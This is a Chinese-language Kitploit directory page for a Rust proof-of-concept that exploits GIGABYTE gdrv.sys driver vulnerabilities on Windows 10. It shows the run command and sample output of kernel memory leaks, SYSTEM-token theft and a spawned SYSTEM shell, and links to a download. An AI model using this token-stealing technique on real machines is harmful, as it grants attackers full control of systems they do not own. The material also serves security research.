Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-1932X — 针对 CVE-2018-1932X 内核驱动程序漏洞的 Rust POC | Kitploit
工具/GitHubGitHub/bkreisel/cve-2018-1932x
权限提升漏洞分析漏洞利用后渗透利用Payload 开发二进制利用
GitHubbkreisel/cve-2018-1932x

CVE-2018-1932X

针对 CVE-2018-1932X 内核驱动程序漏洞的 Rust POC

查看仓库
33年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-1932X(Rust 漏洞利用 PoC)针对 GIGABYTE APP Center v1.05.21 及更早版本

仅仅因为你的目标内存不安全,并不代表你的漏洞利用也必须不安全!

使用的漏洞:

  • CVE-2018-19320 - ring0 memcpy-like 功能
  • CVE-2018-19323 - 读写机器特定寄存器 (MSRs)。

测试环境:

  • 20H1:Windows 10 Kernel Version 19041 MP (1 procs) Free x64

参考资源

  • Vergilius 项目:内核结构
  • 技嘉补丁公告
  • _KPCR 详情

环境要求

  • 仅支持 x64
  • 上述测试版本号
  • 已加载技嘉驱动:gdrv.sys

使用方法

.\CVE-2018-1932X.exe

示例

root@kitploit:~
PS Z:\CVE-2018-1932X\target\debug> .\CVE-2018-1932X.exe
CVE-2019-1932X

打开内核驱动句柄:\\.\GIO
获取句柄:0xa8
发送 IOCTL:0xc3502580,数据长度为 0x10 字节
  [+] 泄露的 _KPCR:ffffe48159d88000
  [*] 地址 _KPCRB:ffffe48159d88020
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
  [+] 泄露的 _KPRCB:ffffe48159d88180
  [*] 地址 _KTHREAD:ffffe48159d88188
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
  [+] 泄露的 _KTHREAD:ffffb50b14d16080
  [*] 地址 _KPROCESS:ffffb50b14d162a0
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
  [+] 泄露的 _KPROCESS:ffffb50b1507f080
  [*] 地址 PID:ffffb50b1507f4c0
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
  [+] 泄露的 PID:2092
  [+] 已知 PID:2092
遍历活动进程链接...
  [*] 地址 ActiveProcessLinks.Flink:ffffb50b1507f4c8 (PID: 82c)
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
  [+] 泄露的 _EPROCESS:fffff8015561e060 (PID: 0)
  [*] 地址 ActiveProcessLinks.Flink:fffff8015561e060 (PID: 0)
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
  [+] 泄露的 _EPROCESS:ffffb50b100624c8 (PID: 4)
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
  [+] 当前令牌:ffff9708cac8306e
  [+] 系统令牌:ffff9708c567b047
借用 SYSTEM 令牌...
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
  [+] 当前令牌:ffff9708c567b047
生成进程...
  [+] 已生成 SYSTEM 进程
关闭内核驱动句柄:\\.\GIO

生成的 Powershell:

root@kitploit:~
PS C:\> whoami
nt authority\system

易受攻击的代码块

Memcpy(IOCTL 0x0C3502808)

Memcpy Code Blocks

MSR 操作(IOCTL 0x0C3502580)

MSR Code Blocks

下载工具